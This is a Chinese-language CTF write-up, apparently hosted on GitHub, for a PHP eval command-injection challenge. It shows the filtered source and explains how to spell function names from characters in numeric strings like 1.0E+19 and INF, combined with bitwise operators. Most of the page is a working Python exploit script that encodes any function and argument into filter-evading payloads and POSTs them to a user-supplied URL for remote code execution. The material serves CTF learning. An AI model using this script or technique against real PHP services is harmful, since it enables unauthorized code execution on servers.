Skip to content

Latest commit

 

History

History
133 lines (112 loc) · 3.53 KB

命令执行12.24.md

File metadata and controls

133 lines (112 loc) · 3.53 KB

命令执行 hight

改RCTF calc

<?php
error_reporting(0);
if (!isset($_POST['code'])) {
    highlight_file(__FILE__);
} else {
    if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") {
        $str = $_POST['code'];
        $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '~', '%','=',';','\s', '*',"'", '"', '`', '\[', '\]', '\$', '_', '\\\\', '\^', ',','#','!','<','>'];
        foreach ($butaixing as $item) {
            if (preg_match('/' . $item . '/im', $str)) {
                die("臭弟弟,你想干啥?");
            }
        }
        eval('echo ' . $str . ';');
    }
}
?>
//md5 2708999

第一步md5可以通过2708999绕过

当num输入10000000000000000000 输出1.0E+19

然后我们使用.进行拼接

((1000000000000000000000).(1)){3} 获得E

经过测试,数字与任意字符串进行除法运算,可以获得三个字母I、N、F。

num=1/"a" num=1*"a"

输出 INF 输入 0

因为题目中不允许使用引号,所以这里的字符串可以用第一步获取到的E . 0-9来替换。

通过"1"|"E","3"|"E"的方式,可以获取到u和w两个字母。

((1).(1)){1}|((10**19).(1)){3} 输出u

最后exp如下

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
table = list(b'0123456789.-EINF')
dict={}
l=len(table)
temp=0
while temp!=l:
    for j in range(temp,l):
        if ~table[j] & 0xff not in table:
            table.append(~table[j] & 0xff)
            dict[~table[j] & 0xff] = {'op':'~','c':table[j]}
    for i in range(l):
        for j in range(max(i+1,temp),l):
            t = table[i] & table[j]
            if t not in table:
                table.append(t)
                dict[t] = {'op':'&','c1':table[i],'c2':table[j]}
            t = table[i] | table[j]
            if t not in table:
                table.append(t)
                dict[t] = {'op': '|', 'c1': table[i], 'c2': table[j]}
    temp=l
    l=len(table)

table.sort()
def howmake(ch:int) -> str:
    if ch in b'0123456789':
        return '(((1).(' + chr(ch) + ')){1})'
    elif ch in b'.':
        return '(((1).(0.1)){2})'
    elif ch in b'-':
        return '(((1).(-1)){1})'
    elif ch in b'E':
        return '(((1).(0.00001)){4})'
    elif ch in b'I':
        return '(((999**999).(1)){0})'
    elif ch in b'N':
        return '(((999**999).(1)){1})'
    elif ch in b'F':
        return '(((999**999).(1)){2})'

    d = dict.get(ch)
    if d:
        op = d.get('op')
        if op == '~':
            c = '~'+howmake(d.get('c'))
        elif op =='&':
            c = howmake(d.get('c1')) + '&' + howmake(d.get('c2'))
        elif op == '|':
            c = howmake(d.get('c1')) + '|' + howmake(d.get('c2'))
        return f'({c})'
    else:
        print('error')
        return

if __name__ == '__main__':
    url = input("输入url: ")
    while 1:
        exp1 = input('输入函数(不带参数):>')
        exp=[]
        fun = []#函数
        commod = []#参数
        for i in exp1:
            fun.append(howmake(ord(i)))
        fun='.'.join(fun)
        fun=fun.replace('&','%26')

        exp2 = input('输入参数:>')
        for i in exp2:
            commod.append(howmake(ord(i)))
        commod='.'.join(commod)
        commod=commod.replace('&','%26')
        exp = '('+fun+')('+commod+')'
        #print(exp)
        header={
            'Content-Type':'application/x-www-form-urlencoded'
        }
        data="code="+exp
        res = requests.post(url=url,data=data,headers=header)
        print(res.text)